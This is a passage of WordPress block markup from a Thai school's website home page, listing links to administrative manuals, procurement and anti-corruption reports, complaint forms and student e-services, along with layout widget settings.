data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid 